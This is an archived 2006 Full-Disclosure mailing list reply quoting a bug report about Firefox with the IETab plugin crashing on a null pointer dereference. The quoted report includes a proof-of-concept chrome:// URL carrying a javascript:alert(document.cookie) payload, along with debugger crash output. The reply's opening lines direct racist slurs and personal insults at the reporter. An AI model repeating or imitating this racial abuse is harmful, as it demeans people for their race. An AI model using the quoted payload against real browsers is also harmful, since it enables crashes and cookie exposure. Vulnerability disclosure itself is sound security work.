[Full-disclosure] Firefox (with IETab Plugin) Null Pointer Dereferences Bug

PERFECT.MATERIAL perfect.material at gmail.com
Thu May 18 06:25:21 BST 2006 

Dear Tan Colored Niggerish Guy,

This is not the right list for Mozilla extension bug reports. This list is
for security stuff only guy :)

PERFECT.MATERIAL

P.S. Your race smells bad you worthless idiot!

On 5/17/06, Debasis Mohanty <debasis.mohanty.listmails at gmail.com> wrote:
>
> Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Vendor: Mozilla
> Product: FireFox with IE Tab
>
> Bugzilla ID: 14151 (http://bugzilla.mozdev.org/show_bug.cgi?id=14151)
> (Initially I incorrectly logged the bug under the wrong product,
> thanks to Dan Veditz to log it under appropriate product on behalf of
> me).
>
> Tested On:
> FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
>
> Introduction:
> IETab (https://addons.mozilla.org/firefox/1419/) is a recently
> released (April 12, 2006) plugin for Firefox. It is used to browse IE
> (only) specific sites under Firefox. Guess what ?? You can run
> windowsupdate under FireFox
> ;-)
>
> Bug Details:
> Firefox with the IETab installed crashes when ietab plugin is unable
> to handle specific javascripts. It seems to be a null pointer
> dereference bug.
> For more details refer the PoC section.
>
> Proof-of-Concept:
> Copy & paste the following URL to the Firefox addressbar and press enter -
>
> chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie
> );
>
> Note: This test will not work if IETab is not installed.
>
> The Registers details after the crash:
>
> (1e4.3e0): Access violation - code c0000005 (first chance) First
> chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00010246
>
> npietab!NP_GetEntryPoints+0xb8ac:
>
> 0192e7dc 668b10           mov     dx,[eax]
> ds:0023:00000000=????
> 0:000> g
> (1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
> nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
> efl=00000246
> npietab!NP_GetEntryPoints+0xb8ac:
> 0192e7dc 668b10           mov     dx,[eax]
> ds:0023:00000000=????
>
>
>
> For more vulnerabilities :
> http://hackingspirits.com/vuln-rnd/vuln-rnd.html
>
>
> Credits:
> Debasis Mohanty (aka Tr0y)
> www.hackingspirits.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060518/519abcae/attachment.html

Full-Disclosure is hosted and sponsored by Secunia.